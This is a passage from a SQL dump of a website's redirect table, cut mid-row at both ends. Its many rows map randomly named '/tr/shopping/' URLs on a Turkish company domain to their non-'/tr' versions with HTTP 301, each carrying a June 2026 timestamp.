00:00:00',301),(69907,'https://3s-technologies.com.tr/tr/shopping/argumentativeness/3771348686.html',NULL,'https://3s-technologies.com.tr/shopping/argumentativeness/3771348686.html','',1,0,'2026-06-11 01:44:25','0000-00-00 00:00:00',301),(69908,'https://3s-technologies.com.tr/tr/shopping/gradually/4239326066.html',NULL,'https://3s-technologies.com.tr/shopping/gradually/4239326066.html','',1,0,'2026-06-11 01:44:28','0000-00-00 00:00:00',301),(69909,'https://3s-technologies.com.tr/tr/shopping/incloud/2956480763.html',NULL,'https://3s-technologies.com.tr/shopping/incloud/2956480763.html','',1,0,'2026-06-11 01:44:38','0000-00-00 00:00:00',301),(69910,'https://3s-technologies.com.tr/tr/shopping/assuringly/849197365.html',NULL,'https://3s-technologies.com.tr/shopping/assuringly/849197365.html','',1,0,'2026-06-11 01:44:42','0000-00-00 00:00:00',301),(69911,'https://3s-technologies.com.tr/tr/shopping/initiation/303629830.html',NULL,'https://3s-technologies.com.tr/shopping/initiation/303629830.html','',1,0,'2026-06-11 01:44:45','0000-00-00 00:00:00',301),(69912,'https://3s-technologies.com.tr/tr/shopping/misconception/1819864980.html',NULL,'https://3s-technologies.com.tr/shopping/misconception/1819864980.html','',1,0,'2026-06-11 01:44:48','0000-00-00 00:00:00',301),(69913,'https://3s-technologies.com.tr/tr/shopping/dominical/3012659693.html',NULL,'https://3s-technologies.com.tr/shopping/dominical/3012659693.html','',1,0,'2026-06-11 01:44:51','0000-00-00 00:00:00',301),(69914,'https://3s-technologies.com.tr/tr/shopping/lisping/1910852866.html',NULL,'https://3s-technologies.com.tr/shopping/lisping/1910852866.html','',1,0,'2026-06-11 01:44:54','0000-00-00 00:00:00',301),(69915,'https://3s-technologies.com.tr/tr/shopping/pingle/3937834028.html',NULL,'https://3s-technologies.com.tr/shopping/pingle/3937834028.html','',1,0,'2026-06-11 01:45:01','0000-00-00 00:00:00',301),(69916,'https://3s-technologies.com.tr/tr/shopping/somehow/3746937492.html',NULL,'https://3s-technologies.com.tr/shopping/somehow/3746937492.html','',1,0,'2026-06-11 01:45:03','0000-00-00 00:00:00',301),(69917,'https://3s-technologies.com.tr/tr/shopping/melodrame/2993583675.html',NULL,'https://3s-technologies.com.tr/shopping/melodrame/2993583675.html','',1,0,'2026-06-11 01:45:06','0000-00-00 00:00:00',301),(69918,'https://3s-technologies.com.tr/tr/shopping/keeper/4177970482.html',NULL,'https://3s-technologies.com.tr/shopping/keeper/4177970482.html','',1,0,'2026-06-11 01:45:09','0000-00-00 00:00:00',301),(69919,'https://3s-technologies.com.tr/tr/shopping/halos/3861169849.html',NULL,'https://3s-technologies.com.tr/shopping/halos/3861169849.html','',1,0,'2026-06-11 01:45:12','0000-00-00 00:00:00',301),(69920,'https://3s-technologies.com.tr/tr/shopping/captivity/1312725625.html',NULL,'https://3s-technologies.com.tr/shopping/captivity/1312725625.html','',1,0,'2026-06-11 01:45:15','0000-00-00 00:00:00',301),(69921,'https://3s-technologies.com.tr/tr/shopping/traitory/1180506781.html',NULL,'https://3s-technologies.com.tr/shopping/traitory/1180506781.html','',1,0,'2026-06-11 01:45:25','0000-00-00 00:00:00',301),(69922,'https://3s-technologies.com.tr/tr/shopping/decigram/905357012.html',NULL,'https://3s-technologies.com.tr/shopping/decigram/905357012.html','',1,0,'2026-06-11 01:45:27','0000-00-00 00:00:00',301),(69923,'https://3s-technologies.com.tr/tr/shopping/hydranth/2252223682.html',NULL,'https://3s-technologies.com.tr/shopping/hydranth/2252223682.html','',1,0,'2026-06-11 01:45:30','0000-00-00 00:00:00',301),(69924,'https://3s-technologies.com.tr/tr/shopping/arcane/2608995583.html',NULL,'https://3s-technologies.com.tr/shopping/arcane/2608995583.html','',1,0,'2026-06-11 01:45:33','0000-00-00 00:00:00',301),(69925,'https://3s-technologies.com.tr/tr/shopping/increments/3410080042.html',NULL,'https://3s-technologies.com.tr/shopping/increments/3410080042.html','',1,0,'2026-06-11 01:45:36','0000-00-00 00:00:00',301),(69926,'https://3s-technologies.com.tr/tr/shopping/cashed/40287081.html',NULL,'https://3s-technologies.com.tr/shopping/cashed/40287081.html','',1,0,'2026-06-11 01:45:39','0000-00-00 00:00:00',301),(69927,'https://3s-technologies.com.tr/tr/shopping/nonrecurring/1399124707.html',NULL,'https://3s-technologies.com.tr/shopping/nonrecurring/1399124707.html','',1,0,'2026-06-11 01:45:46','0000-00-00 00:00:00',301),(69928,'https://3s-technologies.com.tr/tr/shopping/regardless/3517863440.html',NULL,'https://3s-technologies.com.tr/shopping/regardless/3517863440.html','',1,0,'2026-06-11 01:45:48','0000-00-00 00:00:00',301),(69929,'https://3s-technologies.com.tr/tr/shopping/vitis/1644480953.html',NULL,'https://3s-technologies.com.tr/shopping/vitis/1644480953.html','',1,0,'2026-06-11 01:45:51','0000-00-00 00:00:00',301),(69930,'https://3s-technologies.com.tr/tr/shopping/invulnerableness/2840633072.html',NULL,'https://3s-technologies.com.tr/shopping/invulnerableness/2840633072.html','',1,0,'2026-06-11 01:45:54','0000-00-00 00:00:00',301),(69931,'https://3s-technologies.com.tr/tr/shopping/rotchie/828302099.html',NULL,'https://3s-technologies.com.tr/shopping/rotchie/828302099.html','',1,0,'2026-06-11 01:45:57','0000-00-00 00:00:00',301),(69932,'https://3s-technologies.com.tr/tr/shopping/contemptuousness/1681564582.html',NULL,'https://3s-technologies.com.tr/shopping/contemptuousness/1681564582.html','',1,0,'2026-06-11 01:46:00','0000-00-00 00:00:00',301),(69933,'https://3s-technologies.com.tr/tr/shopping/variformed/1645693068.html',NULL,'https://3s-technologies.com.tr/shopping/variformed/1645693068.html','',1,0,'2026-06-11 01:46:06','0000-00-00 00:00:00',301),(69934,'https://3s-technologies.com.tr/tr/shopping/utopian/1573150196.html',NULL,'https://3s-technologies.com.tr/shopping/utopian/1573150196.html','',1,0,'2026-06-11 01:46:09','0000-00-00 00:00:00',301),(69935,'https://3s-technologies.com.tr/tr/shopping/dandi/2090350968.html',NULL,'https://3s-technologies.com.tr/shopping/dandi/2090350968.html','',1,0,'2026-06-11 01:46:12','0000-00-00 00:00:00',301),(69936,'https://3s-technologies.com.tr/tr/shopping/projet/1251370041.html',NULL,'https://3s-technologies.com.tr/shopping/projet/1251370041.html','',1,0,'2026-06-11 01:46:15','0000-00-00 00:00:00',301),(69937,'https://3s-technologies.com.tr/tr/shopping/levity/1505695990.html',NULL,'https://3s-technologies.com.tr/shopping/levity/1505695990.html','',1,0,'2026-06-11 01:46:18','0000-00-00 00:00:00',301),(69938,'https://3s-technologies.com.tr/tr/shopping/propolis/4250273084.html',NULL,'https://3s-technologies.com.tr/shopping/propolis/4250273084.html','',1,0,'2026-06-11 01:46:21','0000-00-00 00:00:00',301),(69939,'https://3s-technologies.com.tr/tr/shopping/blatherskite/3927280830.html',NULL,'https://3s-technologies.com.tr/shopping/blatherskite/3927280830.html','',1,0,'2026-06-11 01:46:52','0000-00-00 00:00:00',301),(69940,'https://3s-technologies.com.tr/tr/shopping/inhearse/1984828261.html',NULL,'https://3s-technologies.com.tr/shopping/inhearse/1984828261.html','',1,0,'2026-06-11 01:46:56','0000-00-00 00:00:00',301),(69941,'https://3s-technologies.com.tr/tr/shopping/sightshot/1027022690.html',NULL,'https://3s-technologies.com.tr/shopping/sightshot/1027022690.html','',1,0,'2026-06-11 01:46:59','0000-00-00 00:00:00',301),(69942,'https://3s-technologies.com.tr/tr/shopping/cullibility/3518026947.html',NULL,'https://3s-technologies.com.tr/shopping/cullibility/3518026947.html','',1,0,'2026-06-11 01:47:02','0000-00-00 00:00:00',301),(69943,'https://3s-technologies.com.tr/tr/shopping/ascap/2321874859.html',NULL,'https://3s-technologies.com.tr/shopping/ascap/2321874859.html','',1,0,'2026-06-11 01:47:05','0000-00-00 00:00:00',301),(69944,'https://3s-technologies.com.tr/tr/shopping/volitive/2131370844.html',NULL,'https://3s-technologies.com.tr/shopping/volitive/2131370844.html','',1,0,'2026-06-11 01:47:08','0000-00-00 00:00:00',301),(69945,'https://3s-technologies.com.tr/tr/shopping/reaffirmation/2446146522.html',NULL,'https://3s-technologies.com.tr/shopping/reaffirmation/2446146522.html','',1,0,'2026-06-11 01:47:16','0000-00-00 00:00:00',301),(69946,'https://3s-technologies.com.tr/tr/shopping/culvers/879268008.html',NULL,'https://3s-technologies.com.tr/shopping/culvers/879268008.html','',1,0,'2026-06-11 01:47:18','0000-00-00 00:00:00',301),(69947,'https://3s-technologies.com.tr/tr/shopping/leastways/1002725177.html',NULL,'https://3s-technologies.com.tr/shopping/leastways/1002725177.html','',1,0,'2026-06-11 01:47:21','0000-00-00 00:00:00',301),(69948,'https://3s-technologies.com.tr/tr/shopping/inherit/3988241996.html',NULL,'https://3s-technologies.com.tr/shopping/inherit/3988241996.html','',1,0,'2026-06-11 01:47:24','0000-00-00 00:00:00',301),(69949,'https://3s-technologies.com.tr/tr/shopping/garreteer/3943443635.html',NULL,'https://3s-technologies.com.tr/shopping/garreteer/3943443635.html','',1,0,'2026-06-11 01:47:28','0000-00-00 00:00:00',301),(69950,'https://3s-technologies.com.tr/tr/shopping/subnuvolar/1370890979.html',NULL,'https://3s-technologies.com.tr/shopping/subnuvolar/1370890979.html','',1,0,'2026-06-11 01:47:31','0000-00-00 00:00:00',301),(69951,'https://3s-technologies.com.tr/tr/shopping/localise/3647726446.html',NULL,'https://3s-technologies.com.tr/shopping/localise/3647726446.html','',1,0,'2026-06-11 01:47:34','0000-00-00 00:00:00',301),(69952,'https://3s-technologies.com.tr/tr/shopping/restaurant/1087308913.html',NULL,'https://3s-technologies.com.tr/shopping/restaurant/1087308913.html','',1,0,'2026-06-11 01:47:37','0000-00-00 00:00:00',301),(69953,'https://3s-technologies.com.tr/tr/shopping/cadaster/3124984256.html',NULL,'https://3s-technologies.com.tr/shopping/cadaster/3124984256.html','',1,0,'2026-06-11 01:47:40','0000-00-00 00:00:00',301),(69954,'https://3s-technologies.com.tr/tr/shopping/gramercy/186829664.html',NULL,'https://3s-technologies.com.tr/shopping/gramercy/186829664.html','',1,0,'2026-06-11 01:47:43','0000-00-00 00:00:00',301),(69955,'https://3s-technologies.com.tr/tr/shopping/clearstarcher/2169387732.html',NULL,'https://3s-technologies.com.tr/shopping/clearstarcher/2169387732.html','',1,0,'2026-06-11 01:47:55','0000-00-00 00:00:00',301),(69956,'https://3s-technologies.com.tr/tr/shopping/undeeded/546954521.html',NULL,'https://3s-technologies.com.tr/shopping/undeeded/546954521.html','',1,0,'2026-06-11 01:47:59','0000-00-00 00:00:00',301),(69957,'https://3s-technologies.com.tr/tr/shopping/anglified/1975670551.html',NULL,'https://3s-technologies.com.tr/shopping/anglified/1975670551.html','',1,0,'2026-06-11 01:48:02','0000-00-00 00:00:00',301),(69958,'https://3s-technologies.com.tr/tr/shopping/raucous/2692878390.html',NULL,'https://3s-technologies.com.tr/shopping/raucous/2692878390.html','',1,0,'2026-06-11 01:48:05','0000-00-00 00:00:00',301),(69959,'https://3s-technologies.com.tr/tr/shopping/coromandelica/2962298734.html',NULL,'https://3s-technologies.com.tr/shopping/coromandelica/2962298734.html','',1,0,'2026-06-11 01:48:08','0000-00-00 00:00:00',301),(69960,'https://3s-technologies.com.tr/tr/shopping/auditorship/407890084.html',NULL,'https://3s-technologies.com.tr/shopping/auditorship/407890084.html','',1,0,'2026-06-11 01:48:11','0000-00-00 00:00:00',301),(69961,'https://3s-technologies.com.tr/tr/shopping/calcareous/3151073260.html',NULL,'https://3s-technologies.com.tr/shopping/calcareous/3151073260.html','',1,0,'2026-06-11 01:48:17','0000-00-00 00:00:00',301),(69962,'https://3s-technologies.com.tr/tr/shopping/hemastatic/1590505266.html',NULL,'https://3s-technologies.com.tr/shopping/hemastatic/1590505266.html','',1,0,'2026-06-11 01:48:19','0000-00-00 00:00:00',301),(69963,'https://3s-technologies.com.tr/tr/shopping/chloroform/3805615168.html',NULL,'https://3s-technologies.com.tr/shopping/chloroform/3805615168.html','',1,0,'2026-06-11 01:48:22','0000-00-00 00:00:00',301),(69964,'https://3s-technologies.com.tr/tr/shopping/repair/93859023.html',NULL,'https://3s-technologies.com.tr/shopping/repair/93859023.html','',1,0,'2026-06-11 01:48:25','0000-00-00 00:00:00',301),(69965,'https://3s-technologies.com.tr/tr/shopping/pachymeningitis/2021684663.html',NULL,'https://3s-technologies.com.tr/shopping/pachymeningitis/2021684663.html','',1,0,'2026-06-11 01:48:28','0000-00-00 00:00:00',301),(69966,'https://3s-technologies.com.tr/tr/shopping/lowstudded/3162067885.html',NULL,'https://3s-technologies.com.tr/shopping/lowstudded/3162067885.html','',1,0,'2026-06-11 01:48:34','0000-00-00 00:00:00',301),(69967,'https://3s-technologies.com.tr/tr/shopping/waylaying/721730832.html',NULL,'https://3s-technologies.com.tr/shopping/waylaying/721730832.html','',1,0,'2026-06-11 01:48:38','0000-00-00 00:00:00',301),(69968,'https://3s-technologies.com.tr/tr/shopping/denutrition/2822769153.html',NULL,'https://3s-technologies.com.tr/shopping/denutrition/2822769153.html','',1,0,'2026-06-11 01:48:41','0000-00-00 00:00:00',301),(69969,'https://3s-technologies.com.tr/tr/shopping/teazehole/4066321396.html',NULL,'https://3s-technologies.com.tr/shopping/teazehole/4066321396.html','',1,0,'2026-06-11 01:48:45','0000-00-00 00:00:00',301),(69970,'https://3s-technologies.com.tr/tr/shopping/odontoid/2918736561.html',NULL,'https://3s-technologies.com.tr/shopping/odontoid/2918736561.html','',1,0,'2026-06-11 01:48:48','0000-00-00 00:00:00',301),(69971,'https://3s-technologies.com.tr/tr/shopping/castilloa/3699644846.html',NULL,'https://3s-technologies.com.tr/shopping/castilloa/3699644846.html','',1,0,'2026-06-11 01:48:51','0000-00-00 00:00:00',301),(69972,'https://3s-technologies.com.tr/tr/shopping/accadian/2349357765.html',NULL,'https://3s-technologies.com.tr/shopping/accadian/2349357765.html','',1,0,'2026-06-11 01:48:58','0000-00-00 00:00:00',301),(69973,'https://3s-technologies.com.tr/tr/shopping/sulkies/4222790162.html',NULL,'https://3s-technologies.com.tr/shopping/sulkies/4222790162.html','',1,0,'2026-06-11 01:49:00','0000-00-00 00:00:00',301),(69974,'https://3s-technologies.com.tr/tr/shopping/glandage/65164002.html',NULL,'https://3s-technologies.com.tr/shopping/glandage/65164002.html','',1,0,'2026-06-11 01:49:03','0000-00-00 00:00:00',301),(69975,'https://3s-technologies.com.tr/tr/shopping/cymatium/1426607645.html',NULL,'https://3s-technologies.com.tr/shopping/cymatium/1426607645.html','',1,0,'2026-06-11 01:49:07','0000-00-00 00:00:00',301),(69976,'https://3s-technologies.com.tr/tr/shopping/heroin/2347963847.html',NULL,'https://3s-technologies.com.tr/shopping/heroin/2347963847.html','',1,0,'2026-06-11 01:49:09','0000-00-00 00:00:00',301),(69977,'https://3s-technologies.com.tr/tr/shopping/zygophyllum/2812001755.html',NULL,'https://3s-technologies.com.tr/shopping/zygophyllum/2812001755.html','',1,0,'2026-06-11 01:49:26','0000-00-00 00:00:00',301),(69978,'https://3s-technologies.com.tr/tr/shopping/knaveries/4023084715.html',NULL,'https://3s-technologies.com.tr/shopping/knaveries/4023084715.html','',1,0,'2026-06-11 01:49:31','0000-00-00 00:00:00',301),(69979,'https://3s-technologies.com.tr/tr/shopping/prejudged/3709407506.html',NULL,'https://3s-technologies.com.tr/shopping/prejudged/3709407506.html','',1,0,'2026-06-11 01:49:34','0000-00-00 00:00:00',301),(69980,'https://3s-technologies.com.tr/tr/shopping/salicylol/1043165645.html',NULL,'https://3s-technologies.com.tr/shopping/salicylol/1043165645.html','',1,0,'2026-06-11 01:49:37','0000-00-00 00:00:00',301),(69981,'https://3s-technologies.com.tr/tr/shopping/superreward/4102518418.html',NULL,'https://3s-technologies.com.tr/shopping/superreward/4102518418.html','',1,0,'2026-06-11 01:49:40','0000-00-00 00:00:00',301),(69982,'https://3s-technologies.com.tr/tr/shopping/rhabdophora/2245152831.html',NULL,'https://3s-technologies.com.tr/shopping/rhabdophora/2245152831.html','',1,0,'2026-06-11 01:49:45','0000-00-00 00:00:00',301),(69983,'https://3s-technologies.com.tr/tr/shopping/counselorship/3243191493.html',NULL,'https://3s-technologies.com.tr/shopping/counselorship/3243191493.html','',1,0,'2026-06-11 01:49:49','0000-00-00 00:00:00',301),(69984,'https://3s-technologies.com.tr/tr/shopping/promissorily/502242186.html',NULL,'https://3s-technologies.com.tr/shopping/promissorily/502242186.html','',1,0,'2026-06-11 01:49:52','0000-00-00 00:00:00',301),(69985,'https://3s-technologies.com.tr/tr/shopping/lasiocampa/3263134284.html',NULL,'https://3s-technologies.com.tr/shopping/lasiocampa/3263134284.html','',1,0,'2026-06-11 01:49:55','0000-00-00 00:00:00',301),(69986,'https://3s-technologies.com.tr/tr/shopping/mousquetaire/1287241571.html',NULL,'https://3s-technologies.com.tr/shopping/mousquetaire/1287241571.html','',1,0,'2026-06-11 01:49:58','0000-00-00 00:00:00',301),(69987,'https://3s-technologies.com.tr/tr/shopping/carrow/4117823911.html',NULL,'https://3s-technologies.com.tr/shopping/carrow/4117823911.html','',1,0,'2026-06-11 01:50:07','0000-00-00 00:00:00',301),(69988,'https://3s-technologies.com.tr/tr/shopping/genius/3201875646.html',NULL,'https://3s-technologies.com.tr/shopping/genius/3201875646.html','',1,0,'2026-06-11 01:50:09','0000-00-00 00:00:00',301),(69989,'https://3s-technologies.com.tr/tr/shopping/sideways/2886569962.html',NULL,'https://3s-technologies.com.tr/shopping/sideways/2886569962.html','',1,0,'2026-06-11 01:50:32','0000-00-00 00:00:00',301),(69990,'https://3s-technologies.com.tr/tr/shopping/equilibrating/2751809792.html',NULL,'https://3s-technologies.com.tr/shopping/equilibrating/2751809792.html','',1,0,'2026-06-11 01:50:35','0000-00-00 00:00:00',301),(69991,'https://3s-technologies.com.tr/tr/shopping/biscayan/4224954752.html',NULL,'https://3s-technologies.com.tr/shopping/biscayan/4224954752.html','',1,0,'2026-06-11 01:50:38','0000-00-00 00:00:00',301),(69992,'https://3s-technologies.com.tr/tr/shopping/partitively/490745900.html',NULL,'https://3s-technologies.com.tr/shopping/partitively/490745900.html','',1,0,'2026-06-11 01:50:41','0000-00-00 00:00:00',301),(69993,'https://3s-technologies.com.tr/tr/shopping/shack/3278679461.html',NULL,'https://3s-technologies.com.tr/shopping/shack/3278679461.html','',1,0,'2026-06-11 01:50:44','0000-00-00 00:00:00',301),(69994,'https://3s-technologies.com.tr/tr/shopping/apathetically/3520028030.html',NULL,'https://3s-technologies.com.tr/shopping/apathetically/3520028030.html','',1,0,'2026-06-11 01:50:47','0000-00-00 00:00:00',301),(69995,'https://3s-technologies.com.tr/tr/shopping/augmented/3617978209.html',NULL,'https://3s-technologies.com.tr/shopping/augmented/3617978209.html','',1,0,'2026-06-11 01:50:51','0000-00-00 00:00:00',301),(69996,'https://3s-technologies.com.tr/tr/shopping/plainness/4129214571.html',NULL,'https://3s-technologies.com.tr/shopping/plainness/4129214571.html','',1,0,'2026-06-11 01:50:53','0000-00-00 00:00:00',301),(69997,'https://3s-technologies.com.tr/tr/shopping/phyma/3660424368.html',NULL,'https://3s-technologies.com.tr/shopping/phyma/3660424368.html','',1,0,'2026-06-11 01:50:56','0000-00-00 00:00:00',301),(69998,'https://3s-technologies.com.tr/tr/shopping/priggery/3349769980.html',NULL,'https://3s-technologies.com.tr/shopping/priggery/3349769980.html','',1,0,'2026-06-11 01:51:03','0000-00-00 00:00:00',301),(69999,'https://3s-technologies.com.tr/tr/shopping/sectionalize/1160710445.html',NULL,'https://3s-technologies.com.tr/shopping/sectionalize/1160710445.html','',1,0,'2026-06-11 01:51:06','0000-00-00 00:00:00',301),(70000,'https://3s-technologies.com.tr/tr/shopping/pretext/3822086381.html',NULL,'https://3s-technologies.com.tr/shopping/pretext/3822086381.html','',1,0,'2026-06-11 01:51:11','0000-00-00 00:00:00',301),(70001,'https://3s-technologies.com.tr/tr/shopping/brewer/721617663.html',NULL,'https://3s-technologies.com.tr/shopping/brewer/721617663.html','',1,0,'2026-06-11 01:51:14','0000-00-00 00:00:00',301),(70002,'https://3s-technologies.com.tr/tr/shopping/margarate/796344463.html',NULL,'https://3s-technologies.com.tr/shopping/margarate/796344463.html','',1,0,'2026-06-11 01:51:17','0000-00-00 00:00:00',301),(70003,'https://3s-technologies.com.tr/tr/shopping/golet/3973822686.html',NULL,'https://3s-technologies.com.tr/shopping/golet/3973822686.html','',1,0,'2026-06-11 01:51:20','0000-00-00 00:00:00',301),(70004,'https://3s-technologies.com.tr/tr/shopping/jetsetting/602376183.html',NULL,'https://3s-technologies.com.tr/shopping/jetsetting/602376183.html','',1,0,'2026-06-11 01:51:23','0000-00-00 00:00:00',301),(70005,'https://3s-technologies.com.tr/tr/shopping/polyandry/1105155732.html',NULL,'https://3s-technologies.com.tr/shopping/polyandry/1105155732.html','',1,0,'2026-06-11 01:51:26','0000-00-00 00:00:00',301),(70006,'https://3s-technologies.com.tr/tr/shopping/hogback/2317009363.html',NULL,'https://3s-technologies.com.tr/shopping/hogback/2317009363.html','',1,0,'2026-06-11 01:51:29','0000-00-00 00:00:00',301),(70007,'https://3s-technologies.com.tr/tr/shopping/rachitis/683022001.html',NULL,'https://3s-technologies.com.tr/shopping/rachitis/683022001.html','',1,0,'2026-06-11 01:51:32','0000-00-00 00:00:00',301),(70008,'https://3s-technologies.com.tr/tr/shopping/ficedula/4085705822.html',NULL,'https://3s-technologies.com.tr/shopping/ficedula/4085705822.html','',1,0,'2026-06-11 01:51:35','0000-00-00 00:00:00',301),(70009,'https://3s-technologies.com.tr/tr/shopping/mense/41386027.html',NULL,'https://3s-technologies.com.tr/shopping/mense/41386027.html','',1,0,'2026-06-11 01:51:38','0000-00-00 00:00:00',301),(70010,'https://3s-technologies.com.tr/tr/shopping/ballproof/2230003148.html',NULL,'https://3s-technologies.com.tr/shopping/ballproof/2230003148.html','',1,0,'2026-06-11 01:51:41','0000-00-00 00:00:00',301),(70011,'https://3s-technologies.com.tr/tr/shopping/nefarious/2216908624.html',NULL,'https://3s-technologies.com.tr/shopping/nefarious/2216908624.html','',1,0,'2026-06-11 01:51:44','0000-00-00 00:00:00',301),(70012,'https://3s-technologies.com.tr/tr/shopping/siphunculated/4007548909.html',NULL,'https://3s-technologies.com.tr/shopping/siphunculated/4007548909.html','',1,0,'2026-06-11 01:51:47','0000-00-00 00:00:00',301),(70013,'https://3s-technologies.com.tr/tr/shopping/pinefinch/3049860450.html',NULL,'https://3s-technologies.com.tr/shopping/pinefinch/3049860450.html','',1,0,'2026-06-11 01:51:50','0000-00-00 00:00:00',301),(70014,'https://3s-technologies.com.tr/tr/shopping/heapy/560144240.html',NULL,'https://3s-technologies.com.tr/shopping/heapy/560144240.html','',1,0,'2026-06-11 01:51:53','0000-00-00 00:00:00',301),(70015,'https://3s-technologies.com.tr/tr/shopping/selectmen/2423744169.html',NULL,'https://3s-technologies.com.tr/shopping/selectmen/2423744169.html','',1,0,'2026-06-11 01:51:56','0000-00-00 00:00:00',301),(70016,'https://3s-technologies.com.tr/tr/shopping/muriculate/1961655236.html',NULL,'https://3s-technologies.com.tr/shopping/muriculate/1961655236.html','',1,0,'2026-06-11 01:51:59','0000-00-00 00:00:00',301),(70017,'https://3s-technologies.com.tr/tr/shopping/accompt/3603771630.html',NULL,'https://3s-technologies.com.tr/shopping/accompt/3603771630.html','',1,0,'2026-06-11 01:52:02','0000-00-00 00:00:00',301),(70018,'https://3s-technologies.com.tr/tr/shopping/nectandra/2296114113.html',NULL,'https://3s-technologies.com.tr/shopping/nectandra/2296114113.html','',1,0,'2026-06-11 01:52:05','0000-00-00 00:00:00',301),(70019,'https://3s-technologies.com.tr/tr/shopping/dominated/2297489719.html',NULL,'https://3s-technologies.com.tr/shopping/dominated/2297489719.html','',1,0,'2026-06-11 01:52:08','0000-00-00 00:00:00',301),(70020,'https://3s-technologies.com.tr/tr/shopping/intentness/2337133957.html',NULL,'https://3s-technologies.com.tr/shopping/intentness/2337133957.html','',1,0,'2026-06-11 01:52:12','0000-00-00 00:00:00',301),(70021,'https://3s-technologies.com.tr/tr/shopping/traducer/2928965444.html',NULL,'https://3s-technologies.com.tr/shopping/traducer/2928965444.html','',1,0,'2026-06-11 01:52:15','0000-00-00 00:00:00',301),(70022,'https://3s-technologies.com.tr/tr/shopping/microzoa/2758822762.html',NULL,'https://3s-technologies.com.tr/shopping/microzoa/2758822762.html','',1,0,'2026-06-11 01:52:18','0000-00-00 00:00:00',301),(70023,'https://3s-technologies.com.tr/tr/shopping/barnstorming/3803337409.html',NULL,'https://3s-technologies.com.tr/shopping/barnstorming/3803337409.html','',1,0,'2026-06-11 01:52:21','0000-00-00 00:00:00',301),(70024,'https://3s-technologies.com.tr/tr/shopping/snack/946477919.html',NULL,'https://3s-technologies.com.tr/shopping/snack/946477919.html','',1,0,'2026-06-11 01:52:24','0000-00-00 00:00:00',301),(70025,'https://3s-technologies.com.tr/tr/shopping/culvert/1901135015.html',NULL,'https://3s-technologies.com.tr/shopping/culvert/1901135015.html','',1,0,'2026-06-11 01:52:27','0000-00-00 00:00:00',301),(70026,'https://3s-technologies.com.tr/tr/shopping/billy/542133866.html',NULL,'https://3s-technologies.com.tr/shopping/billy/542133866.html','',1,0,'2026-06-11 01:52:30','0000-00-00 00:00:00',301),(70027,'https://3s-technologies.com.tr/tr/shopping/hemself/585741447.html',NULL,'https://3s-technologies.com.tr/shopping/hemself/585741447.html','',1,0,'2026-06-11 01:52:36','0000-00-00 00:00:00',301),(70028,'https://3s-technologies.com.tr/tr/shopping/blooded/3016413118.html',NULL,'https://3s-technologies.com.tr/shopping/blooded/3016413118.html','',1,0,'2026-06-11 01:52:39','0000-00-00 00:00:00',301),(70029,'https://3s-technologies.com.tr/tr/shopping/barbatulus/2025224891.html',NULL,'https://3s-technologies.com.tr/shopping/barbatulus/2025224891.html','',1,0,'2026-06-11 01:52:42','0000-00-00 00:00:00',301),(70030,'https://3s-technologies.com.tr/tr/shopping/taboring/2085485504.html',NULL,'https://3s-technologies.com.tr/shopping/taboring/2085485504.html','',1,0,'2026-06-11 01:52:45','0000-00-00 00:00:00',301),(70031,'https://3s-technologies.com.tr/tr/shopping/mumblingly/323754424.html',NULL,'https://3s-technologies.com.tr/shopping/mumblingly/323754424.html','',1,0,'2026-06-11 01:52:48','0000-00-00 00:00:00',301),(70032,'https://3s-technologies.com.tr/tr/shopping/mindererus/235207852.html',NULL,'https://3s-technologies.com.tr/shopping/mindererus/235207852.html','',1,0,'2026-06-11 01:52:51','0000-00-00 00:00:00',301),(70033,'https://3s-technologies.com.tr/tr/shopping/dnase/1595257561.html',NULL,'https://3s-technologies.com.tr/shopping/dnase/1595257561.html','',1,0,'2026-06-11 01:52:54','0000-00-00 00:00:00',301),(70034,'https://3s-technologies.com.tr/tr/shopping/enthral/2079339275.html',NULL,'https://3s-technologies.com.tr/shopping/enthral/2079339275.html','',1,0,'2026-06-11 01:52:57','0000-00-00 00:00:00',301),(70035,'https://3s-technologies.com.tr/tr/shopping/enrive/3930657519.html',NULL,'https://3s-technologies.com.tr/shopping/enrive/3930657519.html','',1,0,'2026-06-11 01:53:00','0000-00-00 00:00:00',301),(70036,'https://3s-technologies.com.tr/tr/shopping/onomastic/4091670216.html',NULL,'https://3s-technologies.com.tr/shopping/onomastic/4091670216.html','',1,0,'2026-06-11 01:53:03','0000-00-00 00:00:00',301),(70037,'https://3s-technologies.com.tr/tr/shopping/canuck/2482724049.html',NULL,'https://3s-technologies.com.tr/shopping/canuck/2482724049.html','',1,0,'2026-06-11 01:53:06','0000-00-00 00:00:00',301),(70038,'https://3s-technologies.com.tr/tr/shopping/changeofpace/411430296.html',NULL,'https://3s-technologies.com.tr/shopping/changeofpace/411430296.html','',1,0,'2026-06-11 01:53:09','0000-00-00 00:00:00',301),(70039,'https://3s-technologies.com.tr/tr/shopping/premious/81699906.html',NULL,'https://3s-technologies.com.tr/shopping/premious/81699906.html','',1,0,'2026-06-11 01:53:12','0000-00-00 00:00:00',301),(70040,'https://3s-technologies.com.tr/tr/shopping/pascha/1316265853.html',NULL,'https://3s-technologies.com.tr/shopping/pascha/1316265853.html','',1,0,'2026-06-11 01:53:15','0000-00-00 00:00:00',301),(70041,'https://3s-technologies.com.tr/tr/shopping/hattree/759766936.html',NULL,'https://3s-technologies.com.tr/shopping/hattree/759766936.html','',1,0,'2026-06-11 01:53:18','0000-00-00 00:00:00',301),(70042,'https://3s-technologies.com.tr/tr/shopping/ellipses/3364194718.html',NULL,'https://3s-technologies.com.tr/shopping/ellipses/3364194718.html','',1,0,'2026-06-11 01:53:21','0000-00-00 00:00:00',301),(70043,'https://3s-technologies.com.tr/tr/shopping/roaringly/751524783.html',NULL,'https://3s-technologies.com.tr/shopping/roaringly/751524783.html','',1,0,'2026-06-11 01:53:27','0000-00-00 00:00:00',301),(70044,'https://3s-technologies.com.tr/tr/shopping/inductometer/1289406177.html',NULL,'https://3s-technologies.com.tr/shopping/inductometer/1289406177.html','',1,0,'2026-06-11 01:53:31','0000-00-00 00:00:00',301),(70045,'https://3s-technologies.com.tr/tr/shopping/lustrum/285158762.html',NULL,'https://3s-technologies.com.tr/shopping/lustrum/285158762.html','',1,0,'2026-06-11 01:53:34','0000-00-00 00:00:00',301),(70046,'https://3s-technologies.com.tr/tr/shopping/jurel/346531430.html',NULL,'https://3s-technologies.com.tr/shopping/jurel/346531430.html','',1,0,'2026-06-11 01:53:37','0000-00-00 00:00:00',301),(70047,'https://3s-technologies.com.tr/tr/shopping/savey/4016218152.html',NULL,'https://3s-technologies.com.tr/shopping/savey/4016218152.html','',1,0,'2026-06-11 01:53:40','0000-00-00 